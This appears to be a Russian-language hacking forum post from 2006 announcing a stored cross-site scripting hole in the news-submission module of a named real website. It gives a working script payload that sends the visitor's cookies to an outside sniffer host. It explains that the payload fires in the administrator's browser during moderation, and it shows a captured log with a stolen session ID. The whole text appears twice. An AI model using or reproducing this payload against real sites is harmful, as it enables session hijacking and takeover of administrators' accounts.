•••™NO FEAR™•••
07.03.2006, 17:18
Вот нашёл XSS на _http://whitep.net/
Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей)
<script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script>
Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе:
Date 07.03.2006 15:02
IP ***********
Real Ip ***********
Referer http://whitep.net/modules.php
Query modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50
Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей)
<script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script>
Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе:
Date 07.03.2006 15:02
IP ***********
Real Ip ***********
Referer http://whitep.net/modules.php
Query modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50